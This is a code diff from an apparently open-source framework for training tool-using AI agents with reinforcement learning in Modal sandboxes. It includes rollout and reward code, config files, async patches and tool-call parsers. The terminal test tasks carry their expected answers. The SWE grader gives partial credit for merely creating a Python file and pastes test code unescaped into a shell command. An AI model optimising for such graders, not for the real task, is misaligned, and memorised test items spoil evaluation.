# Also print to stdout for immediate visibility
for summary in error_summaries:
print(f" Tool Error: {summary}")
self._tool_error_buffer = []
else:
wandb_metrics["train/tool_errors_count"] = 0
await super().wandb_log(wandb_metrics)
async def collect_trajectory(
self, item: Item
) -> Tuple[Optional[Union[ScoredDataItem, Any]], List[Item]]:
"""
Run a single rollout: agent loop + reward computation.
This is called group_size times in parallel by collect_trajectories().
Each call gets its own task_id for terminal/browser session isolation.
"""
task_id = str(uuid.uuid4())
# Get group-level tools (resolved once in collect_trajectories)
if self._current_group_tools is None:
# Fallback: resolve per-trajectory if called outside collect_trajectories
tools, valid_names = self._resolve_tools_for_group()
else:
tools, valid_names = self._current_group_tools
# Build initial messages
messages: List[Dict[str, Any]] = []
if self.config.system_prompt:
messages.append({"role": "system", "content": self.config.system_prompt})
messages.append({"role": "user", "content": self.format_prompt(item)})
# Run the agent loop
result: AgentResult
if self._use_managed_server():
# Phase 2: ManagedServer with ToolCallTranslator -- exact tokens + logprobs
# tool_parser is set on ServerManager in __init__ and passed through
# to ManagedServer, which uses ToolCallTranslator for bidirectional
# translation between raw text and OpenAI tool_calls.
try:
async with self.server.managed_server(
tokenizer=self.tokenizer,
preserve_think_blocks=bool(self.config.thinking_mode),
) as managed:
agent = HermesAgentLoop(
server=managed,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
except NotImplementedError:
# DummyManagedServer not allowed -- fall back to Phase 1
logger.warning(
"ManagedServer not available (OpenAI server?). "
"Falling back to direct server mode."
)
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
else:
# Phase 1: OpenAI server -- native tool_calls, placeholder tokens
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# Skip reward computation if the agent loop produced no meaningful work
# (e.g., API call failed on turn 1). No point spinning up a Modal sandbox
# just to verify files that were never created.
only_system_and_user = all(
msg.get("role") in ("system", "user") for msg in result.messages
)
if result.turns_used == 0 or only_system_and_user:
logger.warning(
"Agent loop produced no output (turns=%d, msgs=%d). Skipping reward.",
result.turns_used, len(result.messages),
)
reward = 0.0
else:
# Compute reward using ToolContext (gives verifier full tool access)
ctx = ToolContext(task_id)
try:
reward = await self.compute_reward(item, result, ctx)
except Exception as e:
logger.error("compute_reward failed: %s", e)
reward = 0.0
finally:
ctx.cleanup()
# Track tool errors for wandb logging
if result.tool_errors:
for err in result.tool_errors:
self._tool_error_buffer.append({
"turn": err.turn,
"tool": err.tool_name,
"args": err.arguments[:150],
"error": err.error[:300],
"result": err.tool_result[:300],
})
# Build ScoredDataItem from ManagedServer state
# Phase 2: real tokens/masks/logprobs from SequenceNodes
# Phase 1: placeholder tokens (still need a valid ScoredDataItem for the pipeline)
nodes = (result.managed_state or {}).get("nodes", [])
if nodes:
# Phase 2 (or DummyManagedServer): use actual node data
node = nodes[-1] # Final sequence node = full trajectory
scored_item: Dict[str, Any] = {
"tokens": node.tokens,
"masks": node.masked_tokens,
"scores": reward,
}
# Include logprobs if available (Phase 2)
if hasattr(node, "logprobs") and node.logprobs:
scored_item["advantages"] = None # Computed by trainer
scored_item["ref_logprobs"] = None
else:
# Phase 1 with no managed state: create placeholder tokens
# so the data pipeline doesn't break. These are NOT suitable
# for training but allow process mode (SFT data gen) to work.
# Tokenize the full conversation to get approximate tokens.
full_text = "\n".join(
msg.get("content", "") for msg in result.messages if msg.get("content")
)
if self.tokenizer:
tokens = self.tokenizer.encode(full_text, add_special_tokens=True)
else:
tokens = list(range(min(len(full_text) // 4, 128)))
scored_item = {
"tokens": tokens,
"masks": [-100] + tokens[1:], # Mask first token as prompt
"scores": reward,
}
# Always include messages for wandb rollout display and data logging
scored_item["messages"] = result.messages
return scored_item, []
# =========================================================================
# Abstract methods -- subclasses must implement
# =========================================================================
@abstractmethod
async def setup(self):
"""
Load dataset, initialize state.
Called once when the environment starts. Typical implementation:
self.dataset = load_dataset(self.config.dataset_name, split=self.config.dataset_split)
self.iter = 0
"""
raise NotImplementedError
@abstractmethod
async def get_next_item(self) -> Item:
"""
Return the next item from the dataset for rollout.
Called by the base env's main loop to get items for workers.
Should cycle through the dataset.
"""
raise NotImplementedError
@abstractmethod
def format_prompt(self, item: Item) -> str:
"""
Convert a dataset item into the user message for the agent.
Args:
item: Dataset item (dict, tuple, etc.)
Returns:
The prompt string to send to the agent
"""
raise NotImplementedError
@abstractmethod
async def compute_reward(
self, item: Item, result: AgentResult, ctx: ToolContext
) -> float:
"""
Score the rollout. Has full access to:
- item: the original dataset item (ground truth, test commands, etc.)
- result: AgentResult with full messages, turn count, reasoning, etc.
- ctx: ToolContext -- call ANY hermes-agent tool (terminal, file, web,
browser, vision...) scoped to this rollout's sandbox. Nothing
is off-limits.
Args:
item: The dataset item that was rolled out
result: The agent's rollout result
ctx: ToolContext with full tool access for verification
Returns:
Reward float (typically 0.0 to 1.0, but any float is valid)
"""
raise NotImplementedError
@abstractmethod
async def evaluate(self, *args, **kwargs):
"""
Periodic evaluation. Called every steps_per_eval steps.
Typical implementation runs the agent on a held-out eval set
and logs metrics via wandb/evaluate_log.
"""
raise NotImplementedError

View File

View File

@@ -0,0 +1,34 @@
# SWE Environment -- Default Configuration
#
# SWE-bench style tasks with Modal sandboxes for cloud isolation.
# Uses terminal + file + web toolsets.
#
# Usage:
# python environments/hermes_swe_env/hermes_swe_env.py serve \
# --config environments/hermes_swe_env/default.yaml
env:
enabled_toolsets: ["terminal", "file", "web"]
max_agent_turns: 30
max_token_length: 4096
group_size: 4
terminal_backend: "modal"
tool_call_parser: "hermes"
tokenizer_name: "NousResearch/DeepHermes-3-Llama-3-3B-Preview"
dataset_name: "bigcode/humanevalpack"
dataset_split: "test"
prompt_field: "prompt"
steps_per_eval: 50
total_steps: 500
use_wandb: true
wandb_name: "hermes-swe"
system_prompt: >
You are a skilled software engineer. You have access to a terminal,
file tools, and web search. Use these tools to complete the coding task.
Write clean, working code and verify it runs correctly before finishing.
openai:
base_url: "http://localhost:8000/v1"
model_name: "NousResearch/DeepHermes-3-Llama-3-3B-Preview"
server_type: "openai"
api_key: ""

View File

@@ -0,0 +1,229 @@
"""
HermesSweEnv -- SWE-Bench Style Environment with Modal Sandboxes
A concrete environment for software engineering tasks where the model writes code
and the reward function runs tests to verify correctness. Uses Modal terminal
backend for cloud-isolated sandboxes per rollout.
The reward function uses ToolContext.terminal() to run test commands in the same
Modal sandbox the model used during its agentic loop. All filesystem state from
the model's tool calls is preserved for verification.
Usage:
# Phase 1: OpenAI server type
vllm serve YourModel --tool-parser hermes
run-api
python environments/hermes_swe_env.py serve \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel \\
--openai.server_type openai \\
--env.dataset_name bigcode/humanevalpack \\
--env.terminal_backend modal
# Phase 2: VLLM server type (full RL training)
python environments/hermes_swe_env.py serve \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel \\
--openai.server_type vllm \\
--env.tool_call_parser hermes \\
--env.terminal_backend modal
"""
import logging
import sys
import time
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
# Ensure repo root is on sys.path for imports
_repo_root = Path(__file__).resolve().parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from datasets import load_dataset
from atroposlib.envs.base import ScoredDataGroup
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from atroposlib.type_definitions import Item
from environments.agent_loop import AgentResult
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.tool_context import ToolContext
logger = logging.getLogger(__name__)
class HermesSweEnvConfig(HermesAgentEnvConfig):
"""Config with defaults for SWE-bench style tasks."""
pass # Inherits all fields, overrides defaults in config_init
class HermesSweEnv(HermesAgentBaseEnv):
"""
SWE-bench style environment using Modal terminal backend.
The model gets a coding task, uses terminal + file + web tools to solve it,
and the reward function runs tests in the same Modal sandbox to verify.
Subclass this for specific SWE datasets (HumanEval, SWE-bench, etc.)
and customize format_prompt() and compute_reward() as needed.
"""
name = "hermes-swe"
env_config_cls = HermesSweEnvConfig
@classmethod
def config_init(cls) -> Tuple[HermesSweEnvConfig, List[APIServerConfig]]:
"""
Default configuration for the SWE environment.
Uses Modal terminal backend for cloud isolation and terminal + file + web toolsets.
"""
env_config = HermesSweEnvConfig(
# Toolsets: terminal for running code, file for reading/writing, web for docs
enabled_toolsets=["terminal", "file", "web"],
disabled_toolsets=None,
distribution=None,
# Agent settings -- SWE tasks need more turns
max_agent_turns=30,
max_token_length=4096,
agent_temperature=1.0,
system_prompt=(
"You are a skilled software engineer. You have access to a terminal, "
"file tools, and web search. Use these tools to complete the coding task. "
"Write clean, working code and verify it runs correctly before finishing."
),
# Modal backend for cloud-isolated sandboxes
terminal_backend="modal",
# Dataset -- override via CLI for your specific SWE dataset
dataset_name="bigcode/humanevalpack",
dataset_split="test",
prompt_field="prompt",
# Atropos settings
group_size=4,
tokenizer_name="NousResearch/DeepHermes-3-Llama-3-3B-Preview",
tool_call_parser="hermes",
steps_per_eval=50,
total_steps=500,
use_wandb=True,
wandb_name="hermes-swe",
)
server_configs = [
APIServerConfig(
base_url="http://localhost:8000/v1",
model_name="NousResearch/DeepHermes-3-Llama-3-3B-Preview",
server_type="openai", # Phase 1; switch to "vllm" for Phase 2
api_key="",
)
]
return env_config, server_configs
async def setup(self):
"""Load the SWE dataset."""
if self.config.dataset_name:
self.dataset = load_dataset(
self.config.dataset_name, split=self.config.dataset_split
)
else:
# Placeholder if no dataset specified
self.dataset = []
self.iter = 0
self.reward_buffer: List[float] = []
async def get_next_item(self) -> Dict[str, Any]:
"""Cycle through the SWE dataset."""
if not self.dataset:
raise ValueError("No dataset loaded. Set dataset_name in config.")
item = self.dataset[self.iter % len(self.dataset)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, Any]) -> str:
"""
Format the SWE task prompt.
Override this in subclasses for different dataset formats.
Default assumes the dataset has a 'prompt' field and optionally a 'test' field.
"""
prompt = item.get(self.config.prompt_field, "")
# If the dataset has test information, include it in the prompt
test_info = item.get("test", item.get("test_code", item.get("tests", "")))
if test_info:
prompt += f"\n\nTests to pass:\n{test_info}"
return prompt
async def compute_reward(
self, item: Dict[str, Any], result: AgentResult, ctx: ToolContext
) -> float:
"""
Score by running tests in the model's Modal sandbox.
Default implementation:
- If the dataset item has a 'test' or 'test_code' field, run it
- Check exit code: 0 = pass, non-zero = fail
- Partial credit for file creation
Override this in subclasses for more sophisticated reward logic.
"""
# Find the test command from the dataset item
test_code = item.get("test", item.get("test_code", item.get("tests", "")))
if test_code:
# Run the test in the model's sandbox
test_result = ctx.terminal(
f'cd /workspace && python3 -c "{test_code}"', timeout=60
)
if test_result["exit_code"] == 0:
self.reward_buffer.append(1.0)
return 1.0
# Partial credit: check if the model created any Python files
file_check = ctx.terminal("find /workspace -name '*.py' -newer /tmp/.start_marker 2>/dev/null | head -5")
if file_check["exit_code"] == 0 and file_check.get("output", "").strip():
self.reward_buffer.append(0.1)
return 0.1
self.reward_buffer.append(0.0)
return 0.0
async def evaluate(self, *args, **kwargs):
"""
Run evaluation on a held-out set.
Override for dataset-specific evaluation logic.
"""
start_time = time.time()
end_time = time.time()
eval_metrics = {"eval/placeholder": 0.0}
await self.evaluate_log(
metrics=eval_metrics,
start_time=start_time,
end_time=end_time,
)
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log SWE-specific metrics."""
if wandb_metrics is None:
wandb_metrics = {}
if self.reward_buffer:
wandb_metrics["train/avg_reward"] = sum(self.reward_buffer) / len(
self.reward_buffer
)
wandb_metrics["train/pass_rate"] = sum(
1 for r in self.reward_buffer if r == 1.0
) / len(self.reward_buffer)
self.reward_buffer = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
HermesSweEnv.cli()

204
environments/patches.py Normal file
View File

@@ -0,0 +1,204 @@
"""
Monkey patches for making hermes-agent tools work inside async frameworks (Atropos).
Problem:
Some tools use asyncio.run() internally (e.g., mini-swe-agent's Modal backend,
web_extract). This crashes when called from inside Atropos's event loop because
asyncio.run() can't be nested.
Solution:
Replace the problematic methods with versions that use a dedicated background
thread with its own event loop. The calling code sees the same sync interface --
call a function, get a result -- but internally the async work happens on a
separate thread that doesn't conflict with Atropos's loop.
These patches are safe for normal CLI use too: when there's no running event
loop, the behavior is identical (the background thread approach works regardless).
What gets patched:
- SwerexModalEnvironment.__init__ -- creates Modal deployment on a background thread
- SwerexModalEnvironment.execute -- runs commands on the same background thread
- SwerexModalEnvironment.stop -- stops deployment on the background thread
Usage:
Call apply_patches() once at import time (done automatically by hermes_base_env.py).
This is idempotent -- calling it multiple times is safe.
"""
import asyncio
import logging
import threading
from typing import Any
logger = logging.getLogger(__name__)
_patches_applied = False
class _AsyncWorker:
"""
A dedicated background thread with its own event loop.
Allows sync code to submit async coroutines and block for results,
even when called from inside another running event loop. Used to
bridge sync tool interfaces with async backends (Modal, SWE-ReX).
"""
def __init__(self):
self._loop: asyncio.AbstractEventLoop = None
self._thread: threading.Thread = None
self._started = threading.Event()
def start(self):
"""Start the background event loop thread."""
self._thread = threading.Thread(target=self._run_loop, daemon=True)
self._thread.start()
self._started.wait(timeout=30)
def _run_loop(self):
"""Background thread entry point -- runs the event loop forever."""
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._started.set()
self._loop.run_forever()
def run_coroutine(self, coro, timeout=600):
"""
Submit a coroutine to the background loop and block until it completes.
Safe to call from any thread, including threads that already have
a running event loop.
"""
if self._loop is None or self._loop.is_closed():
raise RuntimeError("AsyncWorker loop is not running")
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return future.result(timeout=timeout)
def stop(self):
"""Stop the background event loop and join the thread."""
if self._loop and self._loop.is_running():
self._loop.call_soon_threadsafe(self._loop.stop)
if self._thread:
self._thread.join(timeout=10)
def _patch_swerex_modal():
"""
Monkey patch SwerexModalEnvironment to use a background thread event loop
instead of asyncio.run(). This makes it safe to call from inside Atropos's
async event loop.
The patched methods have the exact same interface and behavior -- the only
difference is HOW the async work is executed internally.
"""
try:
from minisweagent.environments.extra.swerex_modal import (
SwerexModalEnvironment,
SwerexModalEnvironmentConfig,
)
from swerex.deployment.modal import ModalDeployment
from swerex.runtime.abstract import Command as RexCommand
except ImportError:
# mini-swe-agent or swe-rex not installed -- nothing to patch
logger.debug("mini-swe-agent Modal backend not available, skipping patch")
return
# Save original methods so we can refer to config handling
_original_init = SwerexModalEnvironment.__init__
def _patched_init(self, **kwargs):
"""Patched __init__: creates Modal deployment on a background thread."""
self.config = SwerexModalEnvironmentConfig(**kwargs)
# Start a dedicated event loop thread for all Modal async operations
self._worker = _AsyncWorker()
self._worker.start()
# Pre-build a modal.Image with pip fix for Modal's legacy image builder.
# Modal requires `python -m pip` to work during image build, but some
# task images (e.g., TBLite's broken-python) have intentionally broken pip.
# Fix: remove stale pip dist-info and reinstall via ensurepip before Modal
# tries to use it. This is a no-op for images where pip already works.
import modal as _modal
image_spec = self.config.image
if isinstance(image_spec, str):
image_spec = _modal.Image.from_registry(
image_spec,
setup_dockerfile_commands=[
"RUN rm -rf /usr/local/lib/python*/site-packages/pip* 2>/dev/null; "
"python -m ensurepip --upgrade --default-pip 2>/dev/null || true",
],
)
# Create AND start the deployment entirely on the worker's loop/thread
# so all gRPC channels and async state are bound to that loop
async def _create_and_start():
deployment = ModalDeployment(
image=image_spec,
startup_timeout=self.config.startup_timeout,
runtime_timeout=self.config.runtime_timeout,
deployment_timeout=self.config.deployment_timeout,
install_pipx=self.config.install_pipx,
modal_sandbox_kwargs=self.config.modal_sandbox_kwargs,
)
await deployment.start()
return deployment
self.deployment = self._worker.run_coroutine(_create_and_start())
def _patched_execute(self, command: str, cwd: str = "", *, timeout: int | None = None) -> dict[str, Any]:
"""Patched execute: runs commands on the background thread's loop."""
async def _do_execute():
return await self.deployment.runtime.execute(
RexCommand(
command=command,
shell=True,
check=False,
cwd=cwd or self.config.cwd,
timeout=timeout or self.config.timeout,
merge_output_streams=True,
env=self.config.env if self.config.env else None,
)
)
output = self._worker.run_coroutine(_do_execute())
return {
"output": output.stdout,
"returncode": output.exit_code,
}
def _patched_stop(self):
"""Patched stop: stops deployment on the background thread, then stops the thread."""
try:
self._worker.run_coroutine(
asyncio.wait_for(self.deployment.stop(), timeout=10),
timeout=15,
)
except Exception:
pass
finally:
self._worker.stop()
# Apply the patches
SwerexModalEnvironment.__init__ = _patched_init
SwerexModalEnvironment.execute = _patched_execute
SwerexModalEnvironment.stop = _patched_stop
logger.debug("Patched SwerexModalEnvironment for async-safe operation")
def apply_patches():
"""
Apply all monkey patches needed for Atropos compatibility.
Safe to call multiple times -- patches are only applied once.
Safe for normal CLI use -- patched code works identically when
there is no running event loop.
"""
global _patches_applied
if _patches_applied:
return
_patch_swerex_modal()
_patches_applied = True

View File

@@ -0,0 +1,34 @@
# Terminal Test Environment -- Default Configuration
#
# Simple file-creation tasks for validating the full Atropos + hermes-agent stack.
# Uses Modal terminal backend and OpenRouter (Claude) for inference.
# API keys loaded from ~/hermes-agent/.env
#
# Usage:
# run-api
# python environments/terminal_test_env/terminal_test_env.py serve \
# --config environments/terminal_test_env/default.yaml
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 10
max_token_length: 2048
group_size: 3
total_steps: 3
steps_per_eval: 3
terminal_backend: "modal"
tool_call_parser: "hermes"
tokenizer_name: "NousResearch/DeepHermes-3-Llama-3-3B-Preview"
ensure_scores_are_not_same: false
use_wandb: false
system_prompt: >
You are a helpful assistant with access to a terminal and file tools.
Complete the user's request by using the available tools.
Be precise and follow instructions exactly.
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-opus-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env

View File

@@ -0,0 +1,292 @@
"""
TerminalTestEnv -- Simple Test Environment for Validating the Stack
A self-contained environment with inline tasks (no external dataset needed).
Each task asks the model to create a file at a known path with specific content.
The reward verifier cats the file and checks if the content matches.
Enables only terminal + file toolsets. Uses Modal terminal backend with
OpenRouter (Claude) by default.
Training tasks (3):
1. Create ~/greeting.txt with "Hello from Hermes Agent"
2. Create ~/count.txt with numbers 1-5, one per line
3. Create ~/answer.txt with the result of 123 + 456
Eval task (1):
1. Create ~/result.txt with the result of 6 * 7
Usage:
# Start Atropos API server
run-api
# Run environment (uses OpenRouter + Modal by default)
python environments/terminal_test_env.py serve
# Process mode (no run-api needed, saves to JSONL)
python environments/terminal_test_env.py process \\
--env.data_path_to_save_groups terminal_test_output.jsonl
"""
import logging
import os
import sys
import time
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
# Ensure repo root is on sys.path for imports
_repo_root = Path(__file__).resolve().parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from atroposlib.envs.base import ScoredDataGroup
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from atroposlib.type_definitions import Item
from environments.agent_loop import AgentResult
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.tool_context import ToolContext
logger = logging.getLogger(__name__)
# =============================================================================
# Inline task definitions -- no external dataset needed
# =============================================================================
TRAIN_TASKS = [
{
"prompt": "Create a file at ~/greeting.txt containing exactly the text: Hello from Hermes Agent",
"verify_path": "~/greeting.txt",
"expected_content": "Hello from Hermes Agent",
},
{
"prompt": "Create a file at ~/count.txt containing the numbers 1 through 5, one per line",
"verify_path": "~/count.txt",
"expected_content": "1\n2\n3\n4\n5",
},
{
"prompt": "Create a file at ~/answer.txt containing the result of 123 + 456",
"verify_path": "~/answer.txt",
"expected_content": "579",
},
]
EVAL_TASKS = [
{
"prompt": "Create a file at ~/result.txt containing the result of 6 * 7",
"verify_path": "~/result.txt",
"expected_content": "42",
},
]
class TerminalTestEnvConfig(HermesAgentEnvConfig):
"""Config with defaults suitable for terminal testing."""
pass # Inherits all fields, overrides defaults in config_init
class TerminalTestEnv(HermesAgentBaseEnv):
"""
Simple test environment with inline file-creation tasks.
All tasks follow the same pattern: "create a file at ~/X.txt with content Y".
The verifier runs `cat ~/X.txt` in the rollout's terminal and checks the output
against the expected string. Same verifier logic for all tasks.
This environment is designed to validate the full stack end-to-end:
- Agent loop executes tool calls (terminal/file)
- ToolContext provides terminal access to the reward function
- Reward function verifies file content via cat
- Scored data flows through the Atropos pipeline
"""
name = "terminal-test"
env_config_cls = TerminalTestEnvConfig
@classmethod
def config_init(cls) -> Tuple[TerminalTestEnvConfig, List[APIServerConfig]]:
"""
Default configuration for the terminal test environment.
Uses Modal terminal backend for cloud isolation and OpenRouter with
Claude for inference. API keys loaded from ~/hermes-agent/.env.
"""
env_config = TerminalTestEnvConfig(
# Terminal + file tools only
enabled_toolsets=["terminal", "file"],
disabled_toolsets=None,
distribution=None,
# Agent settings
max_agent_turns=10, # Simple tasks, don't need many turns
max_token_length=16000,
agent_temperature=1.0,
system_prompt=(
"You are a helpful assistant with access to a terminal and file tools. "
"Complete the user's request by using the available tools. "
"Be precise and follow instructions exactly."
),
# Modal terminal backend for cloud-isolated sandboxes per rollout
terminal_backend="modal",
# Atropos settings
group_size=3, # 3 rollouts per group
tokenizer_name="NousResearch/q-30b-t-h45-e1",
tool_call_parser="hermes",
steps_per_eval=3, # Eval after all 3 steps
total_steps=3, # 3 groups total (1 group per step)
use_wandb=True,
wandb_name="terminal-test",
ensure_scores_are_not_same=False, # Allow all-same scores for simple tasks
# No external dataset
dataset_name=None,
)
# OpenRouter with Claude -- API key loaded from .env (OPENROUTER_API_KEY)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-opus-4.6",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False, # OpenRouter doesn't have a /health endpoint
)
]
return env_config, server_configs
async def setup(self):
"""Initialize inline task lists."""
self.train_tasks = list(TRAIN_TASKS)
self.eval_tasks = list(EVAL_TASKS)
self.iter = 0
# Track reward stats for wandb logging
self.reward_buffer: List[float] = []
async def get_next_item(self) -> Dict[str, str]:
"""Cycle through training tasks."""
item = self.train_tasks[self.iter % len(self.train_tasks)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, str]) -> str:
"""The prompt is directly in the task item."""
return item["prompt"]
async def compute_reward(
self, item: Dict[str, str], result: AgentResult, ctx: ToolContext
) -> float:
"""
Verify by cat-ing the expected file path and checking content matches.
Same verifier for all tasks -- they all write a file at a known path.
Scoring:
1.0 = exact match
0.5 = expected content is present but has extra stuff
0.0 = file doesn't exist or content doesn't match
"""
verify_result = ctx.terminal(f"cat {item['verify_path']}")
# File doesn't exist or can't be read
if verify_result["exit_code"] != 0:
self.reward_buffer.append(0.0)
return 0.0
actual = verify_result.get("output", "").strip()
expected = item["expected_content"].strip()
# Exact match
if actual == expected:
self.reward_buffer.append(1.0)
return 1.0
# Partial credit: expected content is present but has extra stuff
if expected in actual:
self.reward_buffer.append(0.5)
return 0.5
self.reward_buffer.append(0.0)
return 0.0
async def evaluate(self, *args, **kwargs):
"""
Run eval tasks using the agent loop and verify results.
Logs accuracy metrics.
"""
start_time = time.time()
correct = 0
total = len(self.eval_tasks)
samples = []
for eval_item in self.eval_tasks:
try:
# For eval, we do a simple single-turn completion (not full agent loop)
# to keep eval fast. The agent loop is tested via training.
completion = await self.server.chat_completion(
messages=[
{"role": "system", "content": self.config.system_prompt or ""},
{"role": "user", "content": eval_item["prompt"]},
],
n=1,
max_tokens=self.config.max_token_length,
temperature=0.0,
split="eval",
)
response_content = (
completion.choices[0].message.content if completion.choices else ""
)
samples.append(
{
"prompt": eval_item["prompt"],
"response": response_content,
"expected": eval_item["expected_content"],
}
)
except Exception as e:
logger.error("Eval failed for item: %s", e)
samples.append(
{
"prompt": eval_item["prompt"],
"response": f"ERROR: {e}",
"expected": eval_item["expected_content"],
}
)
end_time = time.time()
eval_metrics = {
"eval/num_samples": total,
}
await self.evaluate_log(
metrics=eval_metrics,
samples=samples,
start_time=start_time,
end_time=end_time,
)
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log training metrics including reward stats and accuracy."""
if wandb_metrics is None:
wandb_metrics = {}
if self.reward_buffer:
total = len(self.reward_buffer)
correct = sum(1 for r in self.reward_buffer if r == 1.0)
partial = sum(1 for r in self.reward_buffer if r == 0.5)
wandb_metrics["train/avg_reward"] = sum(self.reward_buffer) / total
wandb_metrics["train/accuracy"] = correct / total
wandb_metrics["train/partial_match_rate"] = partial / total
wandb_metrics["train/total_rollouts"] = total
self.reward_buffer = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
TerminalTestEnv.cli()

View File

@@ -0,0 +1,120 @@
"""
Tool Call Parser Registry
Client-side parsers that extract structured tool_calls from raw model output text.
Used in Phase 2 (VLLM server type) where ManagedServer's /generate endpoint returns
raw text without tool call parsing.
Each parser is a standalone reimplementation of the corresponding VLLM parser's
non-streaming extract_tool_calls() logic. No VLLM dependency -- only standard library
(re, json, uuid) and openai types.
Usage:
from environments.tool_call_parsers import get_parser
parser = get_parser("hermes")
content, tool_calls = parser.parse(raw_model_output)
# content = text with tool call markup stripped
# tool_calls = list of ChatCompletionMessageToolCall objects, or None
"""
import logging
from abc import ABC, abstractmethod
from typing import Dict, List, Optional, Tuple, Type
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
)
logger = logging.getLogger(__name__)
# Type alias for parser return value
ParseResult = Tuple[Optional[str], Optional[List[ChatCompletionMessageToolCall]]]
class ToolCallParser(ABC):
"""
Base class for tool call parsers.
Each parser knows how to extract structured tool_calls from a specific
model family's raw output text format.
"""
@abstractmethod
def parse(self, text: str) -> ParseResult:
"""
Parse raw model output text for tool calls.
Args:
text: Raw decoded text from the model's completion
Returns:
Tuple of (content, tool_calls) where:
- content: text with tool call markup stripped (the message 'content' field),
or None if the entire output was tool calls
- tool_calls: list of ChatCompletionMessageToolCall objects,
or None if no tool calls were found
"""
raise NotImplementedError
# Global parser registry: name -> parser class
PARSER_REGISTRY: Dict[str, Type[ToolCallParser]] = {}
def register_parser(name: str):
"""
Decorator to register a parser class under a given name.
Usage:
@register_parser("hermes")
class HermesToolCallParser(ToolCallParser):
...
"""
def decorator(cls: Type[ToolCallParser]) -> Type[ToolCallParser]:
PARSER_REGISTRY[name] = cls
return cls
return decorator
def get_parser(name: str) -> ToolCallParser:
"""
Get a parser instance by name.
Args:
name: Parser name (e.g., "hermes", "mistral", "llama3_json")
Returns:
Instantiated parser
Raises:
KeyError: If parser name is not found in registry
"""
if name not in PARSER_REGISTRY:
available = sorted(PARSER_REGISTRY.keys())
raise KeyError(
f"Tool call parser '{name}' not found. Available parsers: {available}"
)
return PARSER_REGISTRY[name]()
def list_parsers() -> List[str]:
"""Return sorted list of registered parser names."""
return sorted(PARSER_REGISTRY.keys())
# Import all parser modules to trigger registration via @register_parser decorators
# Each module registers itself when imported
from environments.tool_call_parsers.hermes_parser import HermesToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.longcat_parser import LongcatToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.mistral_parser import MistralToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.llama_parser import LlamaToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.qwen_parser import QwenToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.deepseek_v3_parser import DeepSeekV3ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.deepseek_v3_1_parser import DeepSeekV31ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.kimi_k2_parser import KimiK2ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.glm45_parser import Glm45ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.glm47_parser import Glm47ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.qwen3_coder_parser import Qwen3CoderToolCallParser # noqa: E402, F401

View File

@@ -0,0 +1,72 @@
"""
DeepSeek V3.1 tool call parser.
Similar to V3 but with a slightly different format:
<tool▁call▁begin>function_name<tool▁sep>arguments<tool▁call▁end>
Note: V3 has type+name before the separator, V3.1 has name before and args after.
Based on VLLM's DeepSeekV31ToolParser.extract_tool_calls()
"""
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("deepseek_v3_1")
@register_parser("deepseek_v31")
class DeepSeekV31ToolCallParser(ToolCallParser):
"""
Parser for DeepSeek V3.1 tool calls.
Slightly different regex than V3: function_name comes before the separator,
arguments come after (no type field, no json code block wrapper).
"""
START_TOKEN = "<tool▁calls▁begin>"
# Regex captures: function_name, function_arguments
PATTERN = re.compile(
r"<tool▁call▁begin>(?P<function_name>.*?)<tool▁sep>(?P<function_arguments>.*?)<tool▁call▁end>",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
if self.START_TOKEN not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
func_name, func_args = match
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
